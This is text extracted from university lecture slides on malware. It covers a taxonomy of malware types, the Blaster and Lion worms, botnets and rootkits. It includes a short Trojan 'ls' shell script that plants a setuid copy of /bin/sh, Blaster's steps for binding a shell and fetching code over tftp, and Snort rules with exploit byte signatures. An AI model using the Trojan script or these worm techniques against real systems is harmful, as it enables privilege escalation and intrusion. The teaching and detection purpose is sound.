Malware
CSC501
A Quick Recap
q
Previous Lecture
Q
Code Injection Attacks
q
Today:
Q
Malware
What is Malicious Software?
q
Malicious Software (a.k.a. Malware)
Q
Software designed to infiltrate or damage a
computer system, without the owner's
informed consent
-- http://en.wikipedia.org/wiki/Malware
Q
Examples:
Ø
Viruses, worms, Trojan horses, spyware, and
other malicious and unwanted software
Q
How about adware?
q
Malware references the intent of the
creator, rather than any particular features
Blaster
Nimda
CodeRed
Source: Symantec Internet Security Threat Report
q
Malware remains a top threat
Why should we care?
Conficker
Worm Infection Map (as of 4/1/09) from CWGq
Recruiting Vulnerable Nodes è
Attack Network
Q
Zero-day
exploits w/o software patches
Q
New
attack strategies
Ø Exploiting vulnerable client-side software, such as IE Ø Propagating malware with RFID tags, cell phones…
Q
Fast massive
replications
q
Providing “Value-Added” Services
Q
DDoS, spamming, or other malicious purposes …
Q
Sell/rent attack networks for profit
Taxonomy of Malicious Software
backdoors Logic Bombs Trojan Horses Viruses Worms Zombies Malicious Programs Needs Host Program Replicate Rootkits Independent
Backdoor
q
Secret entry point into a system
Q
Specific user identifier or password that
circumvents normal security procedures.
q
Commonly used by developers
Logic Bomb
q
Embedded in legitimate programs
q
Activated when specified conditions
met
Q
E.g., presence/absence of some file;
Particular date/time or particular user
q
When triggered, typically damages
system
Trojan Horse
q Attacker:
cat >/homes/victim/ls <<eof
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
eof
q Victim
ls
q
Program with an expected
and hidden effect
Q Appears normal/expected Q hidden effect violates
security policy
q
User tricked into executing
Trojan horse
Q Expects (and sees)
expected behavior
Q Hidden effect performed
Virus
q
Self-replicating code
Q
Alters normal code with “infected” version
Q
Generally tries to remain undetected
q
Operates when infected code executed
If spread condition
thenFor target files
if not infected then alter to include virus
Perform malicious action
Worm
q
Runs independently
Q
Does not require a host program
q
Propagates a fully working version of itself
to other machines
q
Carries a payload performing hidden tasks
Q
Backdoors, spam relays, DDoS agents; …
q
Phases
Worm Propagation
A Worm
A Victim
1:Target Probing 2: Vulnerability Exploitation 3: ReplicationMSBlast Worm (Aug., 2003)
192.168.0.1
Blaster
Target/RPC
192.168.10.11
1. Exploits target on port 135/TCP 2. Binds svchost.exe to port
4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP 6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file
8. Sends “START msblast.exe” command 9. Runs worm on target!
10. Closes connection
>tftp –I 192.168.0.1 GET msblast.exe
11. Shell closes
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Example II : Lion/Linux Worm
192.168.0.1
Lion
Target/BIND
192.168.10.11
1. Checks reach-ability by connecting 53/TCP 2. Exploit target on port 53/TCP
3. Runs a shell command 4. Runs worm on target!
3. Replicate worms on port 27374/TCP
alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)
alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)
alert tcp $HOME_NET any -> $EXTERNAL_NET 27374
(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)
alert tcp $HOME_NET any -> $EXTERNAL_NET 27374
(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)
Zombie
q
Secretly takes over another
networked computer by exploiting
software flows
q
Builds the compromised computers
into a zombie network or botnet
q
Uses it to indirectly launch attacks
Detailed Steps (1)
Unsecured Computers Attacker
Attacker scans Internet for
unsecured systems that can be compromised
1
Detailed Steps (2)
Unsecured Computersbie Attacker
Internet
Attacker secretlyinstalls zombie agent programs, turning
unsecured computers into zombies
2
Detailed Steps (3)
AttackerInternet
Zombie agents Zombie agents ``phone home’’ and connect to a master server3
Zombies Master ServerDetailed Steps (4)
AttackerInternet
Zombies Master ServerAttacker sends commands to Master Server to launch a DDoS attack against
a targeted system
Internet
Detailed Steps (5)
Attacker Zombies Master Server Master Server sends signal to zombies to launch attack on targeted system5
Targeted System SystemInternet
Detailed Steps (6)
Attacker Zombies Master Server Targeted system is overwhelmed by zombie requests, denying requests from normal users6
Targeted System System User Request DeniedRootkit
q
“A rootkit is a set of programs and
code that allows a permanent or
consistent, undetectable presence on
a computer”
q
Goals:
Q Hide malicious resources
(
e.g.,processes, files, registry keys, open ports, etc.
)
_ _ ____ _ _ _ _ ___ ___ ___ | | (_)_ __ _ ___ __ | _ \ ___ ___ | |_| | _(_) |_ |_ _|_ _|_ _| | | | | '_ \| | | \ \/ / | |_) / _ \ / _ \| __| |/ / | __| | | | | | | | |___| | | | | |_| |> < | _ < (_) | (_) | |_| <| | |_ | | | | | | |_____|_|_| |_|\__,_/_/\_\ |_| \_\___/ \___/ \__|_|\_\_|\__| |___|___|___|
ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing
netstat Trojaned! Hide connections chfn Trojaned! User->r00t
chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access passwd Trojaned! User->r00t
ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs
linsniffer Packet sniffer! fix File fixer!
z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor!
lled lastlog editor!
bindshell port/shell type daemon!
Rootkit
q
Simple rootkits:
Q
Modify user programs (ls, ps)
Q
Detectable by tools like Tripwire
q
Sophisticated rootkits:
Q
Modify the kernel itself
Rootkit Classification
Kernel
Trojan login Trojan ps Trojan ifconfig good tripwire Kernel-level RootKitKernel
good login good ps good ifconfig good tripwire Trojan Kernel ModuleApplication-level Rootkit (I) Application-level Rootkit (II)
Kernel
Evil Program good program good program good program good programShadow Walker, adore Hxdef, NTIllusion